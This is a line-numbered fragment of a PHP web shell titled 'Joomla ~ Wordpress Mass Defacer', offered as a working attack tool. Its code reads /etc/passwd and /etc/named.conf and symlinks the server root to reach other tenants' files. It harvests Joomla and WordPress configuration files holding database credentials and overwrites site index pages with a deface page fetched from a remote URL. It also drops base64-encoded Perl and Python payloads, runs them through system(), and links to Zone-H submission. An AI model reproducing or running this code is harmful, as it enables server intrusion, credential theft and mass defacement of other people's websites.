  1427. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1428. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1429. $buffer = curl_exec($ch);
  1430. $pos = strpos($buffer,"com_config");
  1431. if($pos === false) {
  1432. $output.= "[-] Login Error<br />";
  1433. } else {
  1434. $output.= "[+] Login Successful<br />";
  1435. }
  1436. }
  1437.  
  1438. if($pos) {
  1439. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  1440. curl_setopt($ch, CURLOPT_URL, $url2);
  1441. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1442. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1443. curl_setopt($ch, CURLOPT_HEADER, 0);
  1444. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1445. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1446. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1447. $buffer = curl_exec($ch);
  1448. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  1449. if($hidden2) {
  1450. $output.= "[+] index.php file founded in Theme Editor<br />";
  1451. } else {
  1452. $output.= "[-] index.php Not found in Theme Editor<br />";
  1453. }
  1454. }
  1455.  
  1456. if($hidden2) {
  1457. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  1458. curl_setopt($ch, CURLOPT_URL, $url2);
  1459. curl_setopt($ch, CURLOPT_POST, 1);
  1460. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  1461. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1462. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1463. curl_setopt($ch, CURLOPT_HEADER, 0);
  1464. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  1465. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  1466. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  1467. $buffer = curl_exec($ch);
  1468. curl_close($ch);
  1469.  
  1470. $pos = strpos($buffer,'<dd class="message message fade">');
  1471. $cond = 0;
  1472. if($pos === false) {
  1473. $output.= "[-] Updating Index.php Error<br />";
  1474. } else {
  1475. $output.= "[+] Index.php Template successfully saved<br />";
  1476. $cond = 1;
  1477. }
  1478. }
  1479. }
  1480. } else {
  1481. $output.= "[-] DB Error<br />";
  1482. }
  1483. global $base_path;
  1484. unlink($base_path.$co);
  1485. return array('cond'=>$cond, 'output'=>$output);
  1486. }
  1487.  
  1488. function exec_mode_1($def_url, $hacker) {
  1489.  
  1490. @mkdir('sym',0777);
  1491. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1492. $fp = @fopen ('sym/.htaccess','w');
  1493. fwrite($fp, $wr);
  1494. @symlink('/','sym/root');
  1495. $dominios = @file_get_contents("/etc/named.conf");
  1496. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  1497. $out[1] = array_unique($out[1]);
  1498. $numero_dominios = count($out[1]);
  1499. echo "Total domains: $numero_dominios <br><br />";
  1500. $def = file_get_contents($def_url);
  1501. $def = urlencode($def);
  1502. $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGVmYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCdwdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
  1503. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  1504. $output = fopen('defaced.html', 'a+');
  1505. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
  1506. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
  1507. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  1508. $j = 1;
  1509. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  1510. for($i = $st; $i <= $numero_dominios; $i++)
  1511. {
  1512. $domain = $out[1][$i];
  1513. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  1514. $infos = @posix_getpwuid($dono_arquivo);
  1515.  
  1516. if($infos['name']!='root') {
  1517. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
  1518. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  1519. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
  1520.  
  1521. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  1522.  
  1523. if($config01 && preg_match('/dbprefix/i',$config01)){
  1524. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1525. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  1526. $res = index_changer_joomla($config01, $def, $domain);
  1527. echo '<td>'.$res['output'].'</td>';
  1528. if($res['cond']) {
  1529. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1530. fwrite($output, 'http://'.$domain."<br>");
  1531. $_SESSION['count1'] = $_SESSION['count1'] + 1;
  1532. } else {
  1533. echo '<td align="center"><span class="red">FAILED</span></td>';
  1534. }
  1535. echo '</tr>';
  1536. }
  1537.  
  1538. if($config02 && preg_match('/DB_NAME/i',$config02)){
  1539. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1540. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  1541. $res = index_changer_wp($config02, $dd);
  1542. echo '<td>'.$res['output'].'</td>';
  1543. if($res['cond']) {
  1544. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1545. fwrite($output, 'http://'.$domain."<br>");
  1546. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  1547. } else {
  1548. echo '<td align="center"><span class="red">FAILED</span></td>';
  1549. }
  1550. echo '</tr>';
  1551. }
  1552. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  1553. if($config03 && preg_match('/DB_NAME/i',$config03)){
  1554. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1555. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  1556. $res = index_changer_wp($config03, $dd);
  1557. echo '<td>'.$res['output'].'</td>';
  1558. if($res['cond']) {
  1559. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1560. fwrite($output, 'http://'.$domain."<br>");
  1561. $_SESSION['count2'] = $_SESSION['count2'] + 1;
  1562. } else {
  1563. echo '<td align="center"><span class="red">FAILED</span></td>';
  1564. }
  1565. echo '</tr>';
  1566. }
  1567. }
  1568. }
  1569. echo '</table>';
  1570. echo '<hr/>';
  1571. echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
  1572. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  1573. if($_SESSION['count1']+$_SESSION['count2'] > 0){
  1574. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  1575. }
  1576. }
  1577. function exec_mode_2($def_url) {
  1578.  
  1579. $domains = @file_get_contents("/etc/named.conf");
  1580. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
  1581. $out = array_unique($out[1]);
  1582. $num = count($out);
  1583. print("Total domains: $num<br><br />");
  1584.  
  1585. $def = file_get_contents($def_url);
  1586. $def = urlencode($def);
  1587.  
  1588. $output = fopen('defaced.html', 'a+');
  1589. $defaced = '';
  1590. $count1 = 0;
  1591. $count2 = 0;
  1592. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  1593. $j = 1;
  1594. $map = array();
  1595. foreach($out as $d) {
  1596. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
  1597. $map[$info['name']] = $d;
  1598. }
  1599. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  1600. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  1601. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  1602. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  1603. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  1604. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  1605. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
  1606. mkdir('plsym',0777);
  1607. file_put_contents('plsym/plsym.cc', base64_decode($dt));
  1608. chmod('plsym/plsym.cc', 0755);
  1609. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
  1610. $fp = @fopen ('plsym/.htaccess','w');
  1611. fwrite($fp, $wr);
  1612. fclose($fp);
  1613. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
  1614.  
  1615. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
  1616. unlink('plsym/plsym.cc');
  1617. $data = file_get_contents($url);
  1618. preg_match_all('/<a href="(.+)">/', $data, $match);
  1619. unset($match[1][0]);
  1620. $i = 1;
  1621. foreach($match[1] as $m)
  1622. {
  1623. $mz = explode('##',urldecode($m));
  1624. $config01 = '';
  1625. $config02 = '';
  1626. if($mz[1] == 'joomla.txt') {
  1627. $config01 = file_get_contents($url.$m);
  1628. }
  1629. if($mz[1] == 'wordpress.txt') {
  1630. $config02 = file_get_contents($url.$m);
  1631. }
  1632. $domain = $map[$mz[0]];
  1633. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  1634.  
  1635. if($config01 && preg_match('/dbprefix/i',$config01)){
  1636. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1637. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  1638. $res = index_changer_joomla($config01, $def, $domain);
  1639. echo '<td>'.$res['output'].'</td>';
  1640. if($res['cond']) {
  1641. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1642. fwrite($output, 'http://'.$domain."<br>");
  1643. $count1++;
  1644. } else {
  1645. echo '<td align="center"><span class="red">FAILED</span></td>';
  1646. }
  1647. echo '</tr>';
  1648. }
  1649.  
  1650. if($config02 && preg_match('/DB_NAME/i',$config02)){
  1651. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1652. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  1653. $res = index_changer_wp($config02, $def);
  1654. echo '<td>'.$res['output'].'</td>';
  1655. if($res['cond']) {
  1656. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1657. fwrite($output, 'http://'.$domain."<br>");
  1658. $count2++;
  1659. } else {
  1660. echo '<td align="center"><span class="red">FAILED</span></td>';
  1661. }
  1662. echo '</tr>';
  1663. }
  1664. }
  1665. echo '</table>';
  1666. echo '<hr/>';
  1667. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  1668. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  1669. if($count1+$count2 > 0){
  1670. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  1671. }
  1672. }
  1673.  
  1674. function exec_mode_3($def_url) {
  1675.  
  1676. $domains = @file_get_contents("/etc/named.conf");
  1677. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
  1678. $out = array_unique($out[1]);
  1679. $num = count($out);
  1680. print("Total domains: $num<br><br />");
  1681.  
  1682. $def = file_get_contents($def_url);
  1683. $def = urlencode($def);
  1684.  
  1685. $output = fopen('defaced.html', 'a+');
  1686. $defaced = '';
  1687. $count1 = 0;
  1688. $count2 = 0;
  1689. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
  1690. $j = 1;
  1691. $map = array();
  1692. foreach($out as $d) {
  1693. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
  1694. $map[$info['name']] = $d;
  1695. }
  1696. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  1697. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  1698. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  1699. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  1700. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  1701. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  1702. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
  1703. mkdir('plsym',0777);
  1704. file_put_contents('plsym/data.txt', $_POST['man_data']);
  1705. file_put_contents('plsym/plsym.cc', base64_decode($dt));
  1706. chmod('plsym/plsym.cc', 0755);
  1707. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
  1708. $fp = @fopen ('plsym/.htaccess','w');
  1709. fwrite($fp, $wr);
  1710. fclose($fp);
  1711. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
  1712.  
  1713. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
  1714. unlink('plsym/plsym.cc');
  1715. $data = file_get_contents($url);
  1716. preg_match_all('/<a href="(.+)">/', $data, $match);
  1717. unset($match[1][0]);
  1718. $i=1;
  1719. foreach($match[1] as $m)
  1720. {
  1721. $mz = explode('##',urldecode($m));
  1722. $config01 = '';
  1723. $config02 = '';
  1724. if($mz[1] == 'joomla.txt') {
  1725. $config01 = file_get_contents($url.$m);
  1726. }
  1727. if($mz[1] == 'wordpress.txt') {
  1728. $config02 = file_get_contents($url.$m);
  1729. }
  1730. $domain = $map[$mz[0]];
  1731. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  1732.  
  1733. if($config01 && preg_match('/dbprefix/i',$config01)){
  1734. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1735. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  1736. $res = index_changer_joomla($config01, $def, $domain);
  1737. echo '<td>'.$res['output'].'</td>';
  1738. if($res['cond']) {
  1739. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1740. fwrite($output, 'http://'.$domain."<br>");
  1741. $count1++;
  1742. } else {
  1743. echo '<td align="center"><span class="red">FAILED</span></td>';
  1744. }
  1745. echo '</tr>';
  1746. }
  1747.  
  1748. if($config02 && preg_match('/DB_NAME/i',$config02)){
  1749. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  1750. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  1751. $res = index_changer_wp($config02, $def);
  1752. echo '<td>'.$res['output'].'</td>';
  1753. if($res['cond']) {
  1754. echo '<td align="center"><span class="green">DEFACED</span></td>';
  1755. fwrite($output, 'http://'.$domain."<br>");
  1756. $count2++;
  1757. } else {
  1758. echo '<td align="center"><span class="red">FAILED</span></td>';
  1759. }
  1760. echo '</tr>';
  1761. }
  1762. }
  1763. echo '</table>';
  1764. echo '<hr/>';
  1765. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  1766. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  1767. if($count1+$count2 > 0){
  1768. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  1769. }
  1770. }
  1771. echo '<!DOCTYPE html>
  1772. <html>
  1773. <head>
  1774. <title>Joomla ~ Wordpress Mass Defacer</title>
  1775. <link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
  1776. <style type="text/css">
  1777. table,body {
  1778. background:
  1779. url("http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG") repeat ,
  1780. url("http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG") no-repeat center top,top left,top right,
  1781. url("https://d33ds.co/img/bg2.png") repeat top left;
  1782. background-color: #ffffff;
  1783. color:white;
  1784. font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
  1785. .header {position:fixed;width:100%;top:0;background:#000;}
  1786. .footer {position:fixed;width:100%;bottom:0;background:#000;}
  1787. input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
  1788. input[type="submit"]:hover{color:SeaShell;}
  1789. input[type="text"]:hover{color:SeaShell;}
  1790. input[type="radio"]{margin-top: 0;}
  1791. .td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
  1792. input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
  1793. .even {background-color: rgba(25, 25, 25, 0.6);}
  1794. .odd {background-color: rgba(102, 102, 102, 0.6);}
  1795. a {color:#fff;} a:hover {color:#00BFFF;}
  1796. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
  1797. textarea{background: rgba(0,0,0,0.6); color: white;}
  1798. .green {color:#00FF00;font-weight:bold;}
  1799. .red {color:#FF0000;font-weight:bold;}
  1800. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
  1801. </style>
  1802. <script type="text/javascript">
  1803. function change() {
  1804. if(document.getElementById(\'rcd\').checked == true) {
  1805. document.getElementById(\'tra\').style.display = \'\';
  1806. } else {
  1807. document.getElementById(\'tra\').style.display = \'none\';
  1808. }
  1809. }
  1810. function hide() {
  1811. document.getElementById(\'tra\').style.display = \'none\';
  1812. }
  1813. </script>
  1814. </head>
  1815. <body>
  1816. <h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
  1817. if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
  1818. echo '<div align="center">
  1819. <form action="" method="post">
  1820. <table>
  1821. <tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
  1822. <tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
  1823. <tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
  1824. <tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
  1825. </table>
  1826. <br />
  1827. <input type="hidden" name="form_action" value="1">
  1828. <table>
  1829. <tr><td><b>index url: </b><input size="35" type="text" name="defpage" value="http://wget.yu.tl/files/lol.css"></tr></td>
  1830. </table>
  1831. <input class=submit type="submit" value="Attack !" name="Submit">
  1832. </form>';
  1833. }
  1834. $milaf_el_index = $_POST['defpage'];
  1835. if($_POST['form_action'] == 1) {
  1836. if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
  1837. if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
  1838. if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
  1839. }
  1840. if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
  1841. echo '</body>
  1842. </html>'; }
  1843. if($_POST['azzatssins2']){
  1844. //$us = file_get_contents("/etc/passwd");
  1845. $usa = fopen('/etc/passwd','r');
  1846. $dir = mkdir('jmp', 0777);
  1847. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
  1848. $frr = fopen('jmp/.htaccess', 'w');
  1849. fwrite($frr, $rrrr);
  1850. while($us = fgets($usa)){
  1851. if($us==""){
  1852. echo "<font color=red>can't read /etc/passwd</font>";
  1853. }
  1854. else{
  1855. preg_match_all('/(.*?):x:/', $us, $user_byk);
  1856. foreach($user_byk[1] as $user){
  1857. $dir1 = "/home/$user/public_html/";
  1858. if(is_readable($dir1)){
  1859. echo "<font color=lime>[+]</font> <font color=green><b><i><font color='lime'>$dir1</i></b></font><br>"; }
  1860. else{
  1861. }
  1862. }
  1863. }
  1864.  
  1865. }}
  1866. if($_POST['azzatssins3']){
  1867. $py =base64_decode('Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCg0Kb3MubWFrZWRpcnMoJ3NsJykNCm9zLmNoZGlyKCdzbCcpDQoNCnN1c3I9W10NCnNpdGV4PVtdDQpvcy5zeXN0ZW0oImxuIC1zIC8gQVpaQVRTU0lOUyIpDQoNCmggPSAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzXG5EaXJlY3RvcnlJbmRleCBzbFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5waHBcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPHRpdGxlPlN5bWJvbGljIExpbmtzPC90aXRsZT48Ym9keSBiZ2NvbG9yPWJsYWNrPjxjZW50ZXI+PGJyPjxkaXYgc3R5bGU9YmFja2dyb3VuZDptYXJvb247bWFyZ2luOjBweDtwYWRkaW5nOjRweDt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjpzaWx2ZXI7PjxpPjxmb250IGNvbG9yPWxpbWU+JmNvcHk7IDwvZm9udD48YSBocmVmPW1haWx0bzpjeWJlcnNlcmtlcnNAZ21haWwuY29tPkFaWkFUU1NJTlMgQ1lCRVJTRVJLRVJTPC9hPjwvaT48YnI+PGJyPjxicj48L2NlbnRlcj4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJzeW1saW5rLmh0bSIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJyPjxicj48Y2VudGVyPjxicj48ZGl2IHN0eWxlPWJhY2tncm91bmQ6dmlvbGV0O21hcmdpbjowcHg7cGFkZGluZzo1cHg7dGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6d2hpdGU7PjxiPjxpPjxmb250IGNvbG9yPXNpbHZlcj48Zm9udCBjb2xvcj1saW1lPiVzPC9mb250PiB8IDxmb250IGNvbG9yPW9yYW5nZT4lczwvZm9udD4gfCA8YSBocmVmPUFaWkFUU1NJTlMvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvZm9udD48L2k+PC9iPjwvZGl2PjwvY2VudGVyPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQ0KCQkJY291bnRlcj1jb3VudGVyKzE=');
  1868. $pys = fopen("symlink.py","w+");
  1869. fwrite($pys,$py);
  1870. system('python symlink.py');
  1871. system('rm symlink.py');
  1872. echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
  1873. }
  1874. if($_POST['azzatssins4']){
  1875. @session_start();
  1876. @set_time_limit(0);
  1877. @ini_set('max_execution_time',0);
  1878. @mkdir('xazs',0777);
  1879. $sempak = "Options all <br>
  1880. DirectoryIndex azzatssins.html <br>
  1881. AddType text/plain .php <br>
  1882. AddHandler server-parsed .php <br>
  1883. AddType text/plain .html <br>
  1884. AddHandler txt .html <br>
  1885. Require None <br>
  1886. Satisfy Any";
  1887. $masuk =@fopen ('xazs/.htaccess','w');
  1888. fwrite($masuk ,$sempak);
